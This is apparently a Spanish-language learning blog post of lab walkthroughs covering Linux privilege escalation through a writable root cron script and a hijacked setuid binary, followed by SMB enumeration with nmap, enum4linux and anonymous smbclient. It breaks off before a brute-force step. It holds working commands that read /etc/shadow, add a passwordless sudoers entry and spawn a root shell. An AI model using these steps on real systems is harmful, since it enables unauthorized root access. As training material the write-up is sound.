<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="es-ES" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Explotación y Post Explotación" />
<meta property="og:locale" content="es_ES" />
<meta name="description" content="Laboratorios." />
<meta property="og:description" content="Laboratorios." />
<link rel="canonical" href="https://balo93.github.io/posts/explotacion-y-post-explotacion/" />
<meta property="og:url" content="https://balo93.github.io/posts/explotacion-y-post-explotacion/" />
<meta property="og:site_name" content="CyberBalo" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-04-20T21:39:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Explotación y Post Explotación" />
<meta name="twitter:site" content="@alvarogbalo" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2026-04-22T00:01:39-05:00","datePublished":"2026-04-20T21:39:00-05:00","description":"Laboratorios.","headline":"Explotación y Post Explotación","mainEntityOfPage":{"@type":"WebPage","@id":"https://balo93.github.io/posts/explotacion-y-post-explotacion/"},"url":"https://balo93.github.io/posts/explotacion-y-post-explotacion/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Explotación y Post Explotación | CyberBalo
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="CyberBalo">
<meta name="application-name" content="CyberBalo">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.6/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/es.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/perfil.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">CyberBalo</a>
    <p class="site-subtitle fst-italic mb-0">Documentando mi camino en la ciberseguridad</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>INICIO</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORÍAS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>ETIQUETAS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVO</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ACERCA DE</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    

      
        <a
          href="https://github.com/Balo93"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    

      
        <a
          href="https://twitter.com/alvarogbalo"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-x-twitter"></i>
        </a>
      
    

      
        <a
          href="javascript:location.href = 'mailto:' + ['alvarogb91','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
          
      

      
        <a
          href="https://www.linkedin.com/in/alvarogavilanes93/"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" class="flex-shrink-0" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Inicio</a>
            </span>

          
        
          
        
          
            
              <span>Explotación y Post Explotación</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link" aria-label="Sidebar">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Entrada
    </div>

    <button type="button" id="search-trigger" class="btn btn-link" aria-label="Search">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Buscar..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancelar</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Explotación y Post Explotación</h1>
    
      <p class="post-desc fw-light mb-4">Laboratorios.</p>
    

    <div class="post-meta text-muted">
      <span>
        Publicado
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1776739140"
  data-df="DD/MM/YYYY"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  20/04/2026
</time>

      </span>

      
        <span>
          Actualizado
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1776834099"
  data-df="DD/MM/YYYY"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  22/04/2026
</time>

        </span>
      

      

      <div class="d-flex justify-content-between">
        <span>
          

          Por

          <em>
            
              <a href="https://twitter.com/alvarogbalo">Alvaro Gavilanes</a>
            
          </em>
        </span>

        <div>
          
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1866 palabras"
>
  <em>10 min</em> de lectura</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Explotación y Post Explotación</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contenido</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Explotación y Post Explotación</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h2 id="cron-jobs-gone-wild-ii"><span class="me-2">Cron Jobs Gone Wild II</span><a href="#cron-jobs-gone-wild-ii" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Cron es un salvavidas para los administradores cuando se trata de realizar tareas de mantenimiento periódicas en el sistema. Incluso pueden utilizarse en casos donde las tareas se llevan a cabo dentro de directorios de usuarios individuales. Sin embargo, tales automatizaciones deben usarse con precaución o pueden dar lugar a ataques fáciles de escalada de privilegios.</p>

<p>Para este laboratorio, nos dan un servicio activo en el puerto 8000, el cual tiene una webshell con un usuario student.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>999<span class="o">(</span>student<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>999<span class="o">(</span>student<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>999<span class="o">(</span>student<span class="o">)</span>

<span class="nb">cat</span> /etc/shadow
<span class="nb">cat</span> /etc/sudoers 
</pre></td></tr></tbody></table></code></div></div>
<p>sudoers es un archivo en donde puedo configurar que binarios quiero permitir a distintos usuarios o grupos para que tengan permisos.</p>

<p>Una herramienta que permite monitorar los procesos activos en linux es <strong><a href="https://github.com/DominicBreuker/pspy">PSPY</a></strong>, permite detectar las tareas que se ejecutan de manera automatizadas cada cierto tiempo.</p>

<p>Para esta práctica al no tener internet se procede de una manera manual.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nb">ls</span> <span class="nt">-la</span>
    message
<span class="nb">cat </span>message
    permission denied
</pre></td></tr></tbody></table></code></div></div>
<p>Al no tener permisos, debemos buscar un comando que permita buscar que ruta hace este llamado, para ello utilizamos el comando <strong>find</strong>.</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>find / <span class="nt">-name</span> message 2&gt;/dev/null
tmp/message
<span class="nb">cat </span>tmp/message
    Hey!! You are no root :<span class="o">(</span>
</pre></td></tr></tbody></table></code></div></div>
<p>Donde cada comando significa lo siguiente:</p>
<ul>
  <li>/ -&gt; busca en la raíz de todo el sistema</li>
  <li>-name -&gt; busca cualquier archivo con el nombre message</li>
  <li>2&gt;/dev/null -&gt; envía todos los errores de permisis denegados a la carpeta null</li>
</ul>

<p>Ahora como ya descubrimos que está el ejecutable en esa ruta podemos ver qué ficheros están ahí</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nb">ls</span> <span class="nt">-l</span> /tmp
    message
    ready
</pre></td></tr></tbody></table></code></div></div>
<p>En donde message tiene un registro de que se modificó recientemente, por lo que sabemos que hay un script o binario modificandolo cada minuto.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nb">grep</span> <span class="nt">-ri</span> /tmp/message / 2&gt;/dev/null
    /usr/local/share/copy.sh:cp /home/student/message /tmp/student
    /usr/local/share/copy.sh:chmod 644 /tmp/student
</pre></td></tr></tbody></table></code></div></div>
<ul>
  <li>-r -&gt; busca de forma recursiva en los directorios que yo le indique</li>
  <li>-i -&gt; ignora las mayúsculas y minúsculas</li>
</ul>

<p>Al haber encontrado el script que se encarga de hacer las copias, procedemos a leer el mismo</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nb">cat</span> /usr/local/share/copy.sh
    <span class="c">#! /bin/bash</span>
    <span class="nb">cp</span> /home/student/message /tmp/message
    <span class="nb">chmod </span>644 /tmp/message
</pre></td></tr></tbody></table></code></div></div>

<p>Si encontramos la forma de modificar el archivo copy.sh, podemos lograr escalar privilegios como administrador.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s1">'#!/bin/bash'</span> <span class="o">&gt;</span> /usr/share/copy.sh
</pre></td></tr></tbody></table></code></div></div>
<p>Al modificar el archivo ya sabemos que si nos deja reemplazar el contenido, con eso ahora si procedemos a editar a nuestro gusto</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s1">'echo"student ALL=NOPASSWORD:ALL" &gt;&gt; /etc/sudoers'</span> <span class="o">&gt;&gt;</span> /usr/local/share/copy.sh
<span class="nb">sudo </span>su
    <span class="nb">cat</span> /etc/sudoers
</pre></td></tr></tbody></table></code></div></div>
<p>Con esto hacemos que el usuario student tenga permiso de ejecutar cualquier binario sin contraseña al agregarlo en la última línea de sudoers con el comando <strong>»</strong>. Esperamos 1 minuto a que se ejecute el script y ya tenemos acceso sudo su.</p>

<h2 id="exploting-setuid-programs"><span class="me-2">Exploting Setuid Programs</span><a href="#exploting-setuid-programs" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Para este laboratorio, nos dan un servicio activo en el puerto 8000, el cual tiene una webshell con un usuario student.</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="nb">ls
    </span>greetings welcome
file welcome
    welcome: setuid ELF 64-bits
<span class="nb">cat </span>greetings
    Permission denied
<span class="nb">ls</span> <span class="nt">-la</span>
    greetings
    <span class="nt">-r-x------</span> welcome
    <span class="nt">-rwsr-xr-x</span> greetings
</pre></td></tr></tbody></table></code></div></div>

<p>Con file podemos ver que welcome es un binario del tipo linux, similar a un exe en windows.
-rw<strong>S</strong>r significa que es un binario con SETUID al tener el bit <strong>“S”</strong> y es un binario que tiene un comportamiento especial, ya que cuando se ejecutan toman los permisos del propietario del archivo, en lugar del usuario que los ejecuta.</p>

<p>Para leer el binario welcome de forma legible, se utiliza el comando <strong>strings</strong></p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>strings welcome
</pre></td></tr></tbody></table></code></div></div>
<p>El comando muestra que dentro del binario está ejecutando greetings. Para probar se intenta eliminar el archivo greetings y lo logramos, lo que significa que nosotros podemos crear un archivo greetings nuestro para que lo ejecute welcome con sus privilegios.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="nb">rm</span> <span class="nt">-r</span> greetings

<span class="nb">cp</span> /bin/bash greetings
<span class="nb">ls
    </span>welcome greetings
</pre></td></tr></tbody></table></code></div></div>

<p>Al hacer esta copia, tenemos que greetings es una /bin/bash y al ejecutarlo practicamente estaremos abriendo una bash con permisos de root.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>./welcome

<span class="c"># whoami</span>
    root
</pre></td></tr></tbody></table></code></div></div>
<p>Para encontrar binarios vulnerables, podemos hacer uso de la web <strong><a href="https://gtfobins.org/">GTFOFBINS</a></strong>, para encontrar un binario solo ejecutamos el siguiente comando:</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>find / <span class="nt">-perm</span> <span class="nt">-4000</span> 2&gt;/dev/null
</pre></td></tr></tbody></table></code></div></div>

<blockquote class="prompt-warning">
  <p>Nota: Binarios -4000 son los que tienen el bit SUID activado.</p>
</blockquote>

<h2 id="netbios-hacking"><span class="me-2">NetBIOS Hacking</span><a href="#netbios-hacking" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>En este laboratorio se va a aprender a enumerar los servicios SMB y herramientas de explotación usando fuerza bruta y herramientas de explotación. También, se cubrirá <em>PIVOTING</em> de dispositivos que están compartiendo la misma red.</p>

<p>Para este laboratorio tendremos 2 direcciones ip destinos</p>
<ul>
  <li>dominio.local     (10.10.50.6)</li>
  <li>dominio1.local    (10.4.25.90)</li>
</ul>

<p>Lo primero es hacer ping y a uno de los dos dominios no vamos a llegar. Muy importante, al hacer ping, nos sirve la ip que nos da la terminal para más adelante.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre>nmap dominio.local
    135/tcp open
    139/tcp open
    445/tcp open
    3389/tcp open
nmap <span class="nt">-p139</span>,445 <span class="nt">--script</span> smb-vuln<span class="k">*</span> dominio.local

    Host script results:
        |_smb-vuln-ms10-061: ERROR: Script execution failed <span class="o">(</span>use <span class="nt">-d</span> to debug<span class="o">)</span>
        |_smb-vuln-ms10-054: <span class="nb">false</span>
</pre></td></tr></tbody></table></code></div></div>

<p>El resultado muestra que no es vulnerable a ethernal blue, y no nos da mayor información, por lo que procedemos con enum4linux</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>enum4linux dominio.local
</pre></td></tr></tbody></table></code></div></div>
<p>En el resultado de enum4linux hay que aclarar que los primeros usuarios que aparecen son los usuarios comunes de un equipo.
<a href="/assets/img/Primer-Blog/enum.png" class="popup img-link shimmer"><img src="/assets/img/Primer-Blog/enum.png" alt="Enum4Linux" loading="lazy"></a>
<em>Usuarios comunes de windows</em></p>

<p>Los usuarios reales del equipo se encuentran más abajo, en la sección que se muestra a continuación:
<a href="/assets/img/Primer-Blog/userenum.png" class="popup img-link shimmer"><img src="/assets/img/Primer-Blog/userenum.png" alt="Usuarios" loading="lazy"></a>
<em>Usuarios encontrados en el sistema</em></p>

<p>El mismo comando, también muestra recursos compartidos en el equipo y sin haberle dado contraseñas
<a href="/assets/img/Primer-Blog/recursos.png" class="popup img-link shimmer"><img src="/assets/img/Primer-Blog/recursos.png" alt="Recursos compartidos" loading="lazy"></a>
<em>Recursos compartidos</em></p>

<p>De enum4linux, lo único valioso que se obtuvo son los nombres de usuarios y el nombre del equipo.</p>

<p>Ahora con SMB Client también se puede enumerar los recursos compartidos.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>smbclient <span class="nt">-L</span> dominio.local <span class="nt">-N</span>
</pre></td></tr></tbody></table></code></div></div>
<p>Donde: 
    * -L permite especificar el dominio
    * -N es anónimo ya que aún no se tiene credenciales.</p>

<p>Para conectarnos a los recursos se procede de la siguiente manera:</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>smbclient <span class="se">\\</span>dominio.local/IPC<span class="nv">$ </span><span class="nt">-N</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Luego de haber recolectado la información, se procede a realizar fuerza bruta ya que encontramos usuarios para probar contraseñas.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
